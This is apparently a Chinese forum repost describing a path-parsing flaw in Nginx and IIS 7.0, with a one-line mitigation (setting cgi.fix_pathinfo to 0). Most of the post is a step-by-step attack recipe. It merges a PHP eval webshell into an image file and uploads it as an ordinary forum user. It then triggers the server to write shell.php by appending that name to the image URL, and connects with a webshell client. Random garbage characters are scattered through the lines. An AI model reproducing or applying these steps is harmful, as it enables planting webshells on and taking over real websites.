IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
( Z; [+ _3 U" _; ^Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
9 t3 r U" f5 {6 ?6 b__________________________________
) R3 w0 N& a m/ e4 F9 M9 T& P3 t/ n, ]# z
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
3 @2 d5 o+ W+ v' O. i先合并一张PHP一句话图片马,合并方法:
8 ~* n r! f0 D' \, o2 z2 X3 f7 `①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
( K' E4 e* H2 H7 r( W! j0 @②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" 6 p' [& U* _$ w0 H; q
图片随便找一张.
" g; u; c2 Y0 p8 f一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> $ i5 d; a. H1 G0 ?4 I2 K: u5 G& \
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 8 ?8 Q3 K9 L! U/ j+ F& b( g) q: M
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 # }# j* D. I, h/ w7 B k
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
# }* U$ d! n' I1 \1 |( c g {则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
9 A1 }& A1 C* J然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 2 n2 k, a3 i! E8 D( Y$ O
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 - g: t$ f+ Y" g3 t7 r
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 , g( E3 t0 ]9 l' v( N. h. w
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
& c0 i. d2 e7 @( o. h/ V在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
4 Y4 o, X2 A; ^$ j( h剩下的就随便你去搞吧。 c5 _- d2 ]6 {$ {
0 n* ^2 X' e R5 q- x( q, n
|